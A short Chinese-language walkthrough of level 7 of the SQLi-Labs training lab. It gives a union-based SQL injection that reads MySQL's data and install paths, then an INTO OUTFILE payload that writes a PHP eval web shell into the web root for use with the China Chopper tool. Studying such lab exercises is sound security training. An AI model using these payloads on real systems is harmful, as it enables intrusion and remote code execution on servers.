SQLI DUMB SERIES-7

（1）查看PHP源代码

可以看见输入的id被一对单引号和两对圆括号包围

（2）根据提示：Dump into Outfile可知，此次攻击需要导出文件

（3）在第一关获取

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

 

?id=2' union select 1,@@datadir,@@basedir --+

 

(4)修改MySql配置，以让能在D盘写入文件（MySQL->my.ini)

(5)payload如下

?id=1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\1234.php' --+

 

尽管显示错误，但在所写目录里有已经写好了文件

（6）运行中国菜刀

至此，攻击完成！